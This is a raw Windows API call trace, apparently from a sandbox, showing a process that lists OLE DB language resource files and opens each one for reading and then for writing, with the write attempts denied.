[0088.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0088.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0088.893] AreFileApisANSI () returned 1 [0088.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui", lpUsedDefaultChar=0x0) returned 67 [0088.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0088.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0088.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.893] AreFileApisANSI () returned 1 [0088.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0088.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82208 [0088.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned 67 [0088.893] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.895] GetFileType (hFile=0x348) returned 0x1 [0088.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0088.895] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.895] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.895] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.896] CloseHandle (hObject=0x348) returned 1 [0088.896] AreFileApisANSI () returned 1 [0088.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0088.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82568 [0088.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned 67 [0088.896] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.896] GetLastError () returned 0x5 [0088.896] GetLastError () returned 0x5 [0088.896] SetLastError (dwErrCode=0x5) [0088.896] GetLastError () returned 0x5 [0088.896] SetLastError (dwErrCode=0x5) [0088.896] GetLastError () returned 0x5 [0088.896] SetLastError (dwErrCode=0x5) [0088.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0088.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0088.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.896] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.897] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9e0d51, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xbc00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oledb32r.dll.mui", cAlternateFileName="")) returned 1 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5ef58 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0088.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0088.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.897] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0088.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0088.897] AreFileApisANSI () returned 1 [0088.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui", lpUsedDefaultChar=0x0) returned 67 [0088.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0088.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0088.898] AreFileApisANSI () returned 1 [0088.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0088.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82958 [0088.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x82958, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 67 [0088.898] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.932] GetFileType (hFile=0x348) returned 0x1 [0088.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82958 | out: hHeap=0x20000) returned 1 [0088.932] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.932] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.932] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.932] CloseHandle (hObject=0x348) returned 1 [0088.933] AreFileApisANSI () returned 1 [0088.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0088.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x824d8 [0088.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x824d8, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 67 [0088.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.933] GetLastError () returned 0x5 [0088.933] GetLastError () returned 0x5 [0088.933] SetLastError (dwErrCode=0x5) [0088.933] GetLastError () returned 0x5 [0088.933] SetLastError (dwErrCode=0x5) [0088.933] GetLastError () returned 0x5 [0088.933] SetLastError (dwErrCode=0x5) [0088.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x824d8 | out: hHeap=0x20000) returned 1 [0088.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0088.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.933] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sqloledb.rll.mui", cAlternateFileName="")) returned 1 [0088.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0088.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0088.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0088.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0088.934] AreFileApisANSI () returned 1 [0088.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", lpUsedDefaultChar=0x0) returned 67 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0088.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0088.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.935] AreFileApisANSI () returned 1 [0088.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0088.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82298 [0088.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 67 [0088.935] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.936] GetFileType (hFile=0x348) returned 0x1 [0088.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0088.937] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.937] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.937] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.937] CloseHandle (hObject=0x348) returned 1 [0088.938] AreFileApisANSI () returned 1 [0088.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0088.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82568 [0088.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 67 [0088.938] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.938] GetLastError () returned 0x5 [0088.938] GetLastError () returned 0x5 [0088.938] SetLastError (dwErrCode=0x5) [0088.938] GetLastError () returned 0x5 [0088.938] SetLastError (dwErrCode=0x5) [0088.938] GetLastError () returned 0x5 [0088.938] SetLastError (dwErrCode=0x5) [0088.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0088.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0088.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.938] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba9f918, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb65d7300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sqlxmlx.rll.mui", cAlternateFileName="")) returned 1 [0088.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0088.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0088.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.939] 